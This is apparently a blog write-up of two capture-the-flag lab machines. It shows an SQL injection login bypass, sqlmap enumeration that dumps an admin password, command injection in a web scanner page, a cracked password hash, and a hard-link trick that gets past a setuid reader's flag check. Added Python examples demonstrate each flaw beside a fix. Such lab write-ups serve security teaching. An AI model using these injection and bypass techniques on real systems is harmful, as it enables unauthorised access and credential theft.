Monday 13 February 2017

DC146:2016 dick dastardly

Hello,

Now it is time for the dick dastardly challenge!

Scanning all ports...

Enumerating web pages

Excellent! The dirb scanner found several interesting files on our target.
The admin.php page redirects us to index.php, which asks us to log in.

Very interesting. Entering admin as the username and ' OR 1=1 -- - as the password in the login form, we got the following result
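To make the bypass concrete, here is an added example (my own code, not code from the original post or from the challenge VM) that reproduces the effect of that payload against a constructed SQLite table shaped like the admins table dumped later on this page, with a placeholder password, next to the parameterised query that defeats it:

```python
import sqlite3

# Payload used on the login form: closes the pass='...' literal, makes the
# WHERE clause always true, and comments out the rest of the statement.
PAYLOAD = "' OR 1=1 -- -"


def make_db():
    # Constructed stand-in for the target's admins table; the password is a
    # placeholder, not the value dumped from the VM.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (id INTEGER, pass TEXT, user TEXT)")
    conn.execute("INSERT INTO admins VALUES (1, 'placeholder-password', 'rasta')")
    conn.commit()
    return conn


def login_vulnerable(conn, user, password):
    # The classic PHP-style mistake: user input concatenated into the SQL text.
    # With PAYLOAD as the password the statement becomes
    #   SELECT user FROM admins WHERE user='admin' AND pass='' OR 1=1 -- -'
    # AND binds tighter than OR, so every row matches and the first one is
    # returned as the "logged in" user.
    query = "SELECT user FROM admins WHERE user='%s' AND pass='%s'" % (user, password)
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, user, password):
    # Parameterised query: the values never become part of the SQL grammar,
    # so the quote and comment characters in PAYLOAD are just bytes in a string.
    row = conn.execute(
        "SELECT user FROM admins WHERE user=? AND pass=?", (user, password)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login with payload ->", login_vulnerable(db, "admin", PAYLOAD))
    print("safe login with payload       ->", login_safe(db, "admin", PAYLOAD))
    print("safe login with real password ->", login_safe(db, "rasta", "placeholder-password"))
```

The vulnerable function logs you in as rasta without knowing any password; the safe one returns nothing for the payload and only succeeds with the real credential. The same split applies whatever the database engine, the point is that values are bound, not pasted into the query.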

Nice! The login form is injectable, so we can point sqlmap at it and try to pull valid credentials.

Good, let's enumerate deeper! Unfortunately we are not able to retrieve the database names through this parameter, so we have to look for another way to get them.

Excellent! We found a second vulnerable parameter. Let's enumerate the databases.

Very good, let's examine the vulnhub database.
Database: vulnhub
Table: admins
[1 entry]
+----+--------------------------------------+--------+
| id | pass                                 | user   |
+----+--------------------------------------+--------+
| 1  | 1b37y0uc4n76u3557h15p455w0rd,5uck3rz | rasta  |
+----+--------------------------------------+--------+
It is not a valid SSH password for the rasta user :( I don't know yet what this password is for.
After clicking on add IP to IRC whitelist I ran the nmap scan again and got a very interesting result

Very good! I installed irssi on my attacking machine and connected to the target's IRC server.

Thursday 9 February 2017

DC146:2016 fortress challenge

Hello,
Now it is time to tackle the fortress challenge.

The scanning phase gave us the following result

Our situation is simple: only three open ports.
So let's begin our penetration test with the web application.

Excellent! We discovered the scanner.php file. Let's examine it.

OK, now we know how this scanner works and what the nmap command it runs looks like.

We appended an id command to the scan target, so let's check what the result looks like.

Excellent! It works: the scanner hands our input to a shell and runs the injected command. So let's examine the target more deeply.
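The mistake behind scanner.php and its fix, as an added example (my own Python, not the challenge's PHP, whose source is not shown on this page). The page does not say which separator was used to smuggle the id command; ';' is assumed here, and echo stands in for nmap so the example runs offline:

```python
import ipaddress
import subprocess

# Constructed attacker input. ';' as the separator is an assumption, and
# 'echo INJECTED' stands in for the 'id' command so the effect is visible
# without nmap or a target host.
INJECTED = "127.0.0.1; echo INJECTED"


def scan_vulnerable(target):
    # Mirrors the scanner's mistake: the submitted target is pasted into a
    # shell command line, so shell metacharacters in it are interpreted.
    # 'echo scanning' stands in for the real nmap invocation.
    cmd = "echo scanning " + target
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate_target(target):
    # Accept only a literal IPv4/IPv6 address; anything else is rejected
    # before it gets anywhere near a command line.
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        raise ValueError("invalid scan target: %r" % target) from None


def rejects(target):
    # True when validate_target refuses the input.
    try:
        validate_target(target)
    except ValueError:
        return True
    return False


def scan_safe(target):
    # Validated value passed as its own argv element with shell=False:
    # no shell parses it, so ';', '|', '$(...)' and friends are inert.
    argv = ["echo", "scanning", validate_target(target)]
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    print(scan_vulnerable(INJECTED), end="")
    print(scan_safe("127.0.0.1"), end="")
    print("injected input rejected by scan_safe:", rejects(INJECTED))
```

Both layers matter: the allow-list validation stops the bad input at the door, and passing an argv list with shell=False means that even a validation bug would not hand an attacker a shell.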

Great! We got something that looks like a line from /etc/shadow (on FreeBSD the hashes live in /etc/master.passwd). The $6$ prefix marks an SHA-512 crypt hash (john's sha512crypt format, hashcat mode 1800), which is slow to crack. After a lot of time...
$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:931qwerty?
Good, the cracked password is 931qwerty?, and we know the SSH port is open, so let's try it there.

We obtained a limited shell! Unfortunately the goal of this challenge is only to find the flags.

Flag #1
$ cat flag.txt
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}
$ pwd
/usr/home/craven
Flag #2
Looking for the next flag, I found it in the /usr/local/www/ directory
$ ls
index.html    k1ngd0m_k3yz    logo.png    s1kr3t        scanner.php    styles.css
$ cd s1kr3t/
$ ls
flag.txt
$ cat flag.txt
FLAG{n0_one_br3aches_teh_f0rt}
Flag #3
The last flag is located in /home/vulnhub/ directory
$ ls
flag.txt    reader
$ cat flag.txt
cat: flag.txt: Permission denied
Hmmm, not a surprise :-) So let's examine the reader file
$ file reader
reader: setuid ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.0 (1100122), FreeBSD-style, not stripped
$ ./reader
./reader [file to read]
Very useful! We can read some files through the setuid reader binary.
$ ./reader /etc/passwd
Checking file type...
Checking if flag file...
Great! Printing file contents...
Win, here's your flag:
# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
Hmmm, a little strange (that header line is the first line of FreeBSD's /etc/passwd), but the binary does read files for us.
$ ./reader flag.txt
Checking file type...
Checking if flag file...
Nope. Can't let you have the flag.
Hmmm, let's try creating a symlink to flag.txt
$ ln -s flag.txt /tmp/flagg.txt
$ ./reader /tmp/flagg.txt
Checking file type...
Symbolic links not allowed!
Grrrr, maybe a hard link will lead us to success?
$ ln -f flag.txt /tmp/flagh.txt
$ ./reader /tmp/flagh.txt
Checking file type...
Checking if flag file...
Nope. Can't let you have the flag.
$ ln -f flag.txt /tmp/test
$ ./reader /tmp/test
Checking file type...
Checking if flag file...
Great! Printing file contents...
Win, here's your flag:
FLAG{its_A_ph0t0_ph1ni5h}
So the "flag file" check looks at the name, not at the file itself: the hard link named flagh.txt still contains the string flag and is refused, while the very same inode under the name test passes both checks and the setuid binary prints the flag. Two things made the trick possible: /tmp and /home/vulnhub are on the same filesystem (hard links cannot cross filesystems), and FreeBSD lets an unprivileged user hard link a file he cannot read unless the security.bsd.hardlink_check_uid sysctl (default 0) is set to 1.
That is the end of the challenge :)
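Why the last attempt worked, as an added example (my own Python, not the reader binary's code, which is not on this page). The first function models the checks the binary appears to perform, reconstructed from its responses in the transcript; the exact substring it matches on is an assumption. The second shows the check a careful author would write instead, comparing the identity of the opened file rather than its name:

```python
import errno
import os
import stat
import tempfile

# Messages copied from the reader binary's observed output.
MSG_SYMLINK = "Symbolic links not allowed!"
MSG_NOPE = "Nope. Can't let you have the flag."
MSG_OK = "Great! Printing file contents..."


def name_based_check(path):
    # Model of what the reader appears to do: refuse symlinks, then refuse any
    # file name containing "flag". The substring is an assumption consistent
    # with the transcript (flag.txt and flagh.txt rejected, test and
    # /etc/passwd accepted). Returns the verdict only, never file contents.
    if stat.S_ISLNK(os.lstat(path).st_mode):
        return MSG_SYMLINK
    if "flag" in os.path.basename(path):
        return MSG_NOPE
    return MSG_OK


def identity_based_check(path, protected):
    # Hardened variant: open without following symlinks, then compare the
    # (device, inode) pair of what was actually opened with the protected
    # file. A hard link is the same inode under another name, so it is caught
    # no matter what it is called.
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError as e:
        if e.errno == errno.ELOOP:
            return MSG_SYMLINK
        raise
    try:
        opened = os.fstat(fd)
    finally:
        os.close(fd)
    guarded = os.stat(protected)
    if (opened.st_dev, opened.st_ino) == (guarded.st_dev, guarded.st_ino):
        return MSG_NOPE
    return MSG_OK


def demo():
    # Constructed layout inside one temporary directory (hard links cannot
    # cross filesystems): the flag, a symlink to it, and two hard links, one
    # with "flag" in its name and one called test, as in the writeup.
    results = {}
    with tempfile.TemporaryDirectory() as d:
        flag = os.path.join(d, "flag.txt")
        with open(flag, "w") as f:
            f.write("FLAG{constructed_example}\n")
        links = {
            "symlink": os.path.join(d, "flagg.txt"),
            "hardlink_flagname": os.path.join(d, "flagh.txt"),
            "hardlink_other": os.path.join(d, "test"),
        }
        os.symlink(flag, links["symlink"])
        os.link(flag, links["hardlink_flagname"])
        os.link(flag, links["hardlink_other"])
        for label, p in links.items():
            results[label] = (name_based_check(p), identity_based_check(p, flag))
    return results


if __name__ == "__main__":
    for label, (by_name, by_identity) in demo().items():
        print("%-18s name check: %-36s identity check: %s" % (label, by_name, by_identity))
```

The name-based model reproduces the transcript exactly, including letting the hard link called test through; the identity-based check refuses all three aliases. In a real setuid program the fstat would be done on the descriptor that is subsequently read, so there is no window between the check and the use.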